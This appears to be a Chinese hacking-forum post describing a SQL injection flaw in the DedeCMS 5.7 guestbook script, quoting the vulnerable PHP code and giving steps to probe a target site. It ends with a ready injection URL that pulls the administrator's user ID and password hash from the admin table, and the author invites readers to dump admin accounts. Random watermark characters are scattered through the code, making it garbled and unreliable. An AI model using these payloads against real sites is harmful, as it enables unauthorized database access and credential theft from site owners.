dedecms5.7最新sql注射漏洞利用 guestbook.php

admin

影响版本为5.7

" M+ J3 d/ A2 s漏洞文件edit.inc.php具体代码：

$ a# ^/ X. S% B' p. E( B< ?php  

if(!defined('DEDEINC')) exit('Request Error!');  
  s4 n: V* i' {7 u! i
   

& Z/ b5 C0 g+ _7 i$ W( b! R/ Dif(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];  

else $GUEST_BOOK_POS = "guestbook.php";  

9 r, E( M  c* N5 U   

9 k' Z) {6 l- G. N& ^' D: f$id = intval($id);  
! p& ^$ a1 b+ C* a0 M
if(empty($job)) $job='view';  
2 k/ o6 q8 `/ [) w, N# I$ b
   

2 |2 G5 f9 n7 N) n2 ?if($job=='del' && $g_isadmin)  

{  

$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");  
' s6 r& o5 \6 Q# m
ShowMsg("成功删除一条留言！", $GUEST_BOOK_POS);  
6 P3 ]) a6 N0 x' W1 P
+ e* V7 B5 k: O4 ]8 cexit();  

}  

else if($job=='check' && $g_isadmin)  
7 Z7 M2 K5 R& t+ W# O& t
{  
  c# k0 N% L2 B; l: p$ o; _4 [
9 e; `' }+ J8 q6 ?1 s$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");  
  l' I) F) w) y+ f
ShowMsg("成功审核一条留言！", $GUEST_BOOK_POS);  

" L& t( C- |! K5 \' uexit();  

}  

else if($job=='editok')  

8 I3 i- i5 O" q$ t% c{  
+ B$ n7 D8 Q: W2 e7 w. L. `
( @0 v# m" J" {0 K1 M$remsg = trim($remsg);  

* Q& n; ^5 j, h6 a& Gif($remsg!='')  
8 m% m  W' {4 v) U5 }
0 S+ ^, Z& q& m5 U" E5 V{  

//管理员回复不过滤HTML By:Errorera blog:errs.cc  

. p0 \; x( E1 C4 C5 N" Rif($g_isadmin)  
* O# p  i) j7 X+ O( k. o& @( p+ v' J* J
{  

3 H# G7 p- L: i% d' F8 S! o$msg = "<div class='rebox'>".$msg."</div>\n".$remsg;  

//$remsg <br /><font color=red>管理员回复：</font> }  
& ^' Y9 x$ W, b
6 ?; ?- L% C5 v/ Nelse
. K' B9 ^& p+ @, s& X+ {) t# O8 N; Q
4 O/ c7 [. Z, q3 d  g% Q0 w* n{  
& j8 c1 _+ W8 L6 l! X2 X, K6 M
$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");  
' ^0 |6 `# F: F' n
: p1 T% x# s4 u. p- F4 }; L$oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n";  

$remsg = trimMsg(cn_substrR($remsg, 1024), 1);  
; w: h) Y( p% ^, P) W1 D3 @: j& H% C
1 J6 t$ k4 N8 j  ?3 i3 h$msg = $oldmsg.$remsg;  

}  

" h+ {3 t9 A/ U# H9 _: k}  

//这里没有对$msg过滤，导致可以任意注入了By:Errorera home:www.errs.cc  
- v5 S8 _8 v* G3 p
$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");  

8 M7 e* C3 ], R, d- B/ S. i# \ShowMsg("成功更改或回复一条留言！", $GUEST_BOOK_POS);  
+ E" L% J6 f" p5 h" p
exit();  
' j5 c- J5 O+ \- H* k; ]9 U
( E1 |  v) v7 I+ j4 R( V- p( i}  

//home:www.errs.cc  

$ ]- H8 Q+ a% h! ^if($g_isadmin)  
8 A1 s7 i$ G+ E
8 o; E. T- O0 r{  

* `5 Y. V0 V0 A! G( h" g$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");  
' @. x8 S2 D3 K0 a& u
require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');  

' B6 v9 S3 s8 K0 T}  
: |4 i# H2 ?5 @, n
else

{  
$ \  O7 F4 r: S
9 S5 f$ E& J1 |( }( {+ U4 }$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");  

; H: S/ f3 g/ ?: Mrequire_once(DEDETEMPLATE.'/plus/guestbook-user.htm');  

2 n7 w+ I6 o! P$ o1 s5 B} 漏洞成功需要条件：
1. php magic_quotes_gpc=off
2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。

* Y2 i+ c* P: }8 ~2 j怎么判断是否存在漏洞：
先打开www.xxx.com/plus/guestbook.php 可以看到别人的留言，
然后鼠标放在 [回复/编辑] 上 可以看到别人留言的ID。那么记下ID
  G$ D7 w; q! f: Z) b/ C访问：

www.xxx.com/plus/guestbook.php?a ... tok&msg=errs.cc存在的留言ID提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
9 J" t) H/ E) B6 c2 B, T- ~. u跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证

* M5 p2 _7 t1 r0 e5 u, T$ P0 j
明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
如果没有修改成功，那留言ID的内容还是以前的 那就证明漏洞可以利用。
那么再次访问
+ U, T2 x6 m- u1 N* L' O
www.xxx.com/plus/guestbook.php?a ... ;job=editok&id=存在的留言ID&msg=',msg=user(),email='然后返回，那条留言ID的内容就直接修改成了mysql 的user().
2 k% F7 ~1 k8 q! h- `6 F6 _
) W! t+ \7 a8 D3 k& o) ?7 h& G大概利用就是这样，大家有兴趣的多研究下！！
# n+ o; A. o" ?' E
& u' b6 ~: l9 E. h% c- ^- G- i最后补充下，估计有人会说怎么暴管理后台帐户密码，你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)！！
. W2 B0 i  `6 A' c# w+ l& ]
. Q: w0 }/ }- Mview sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='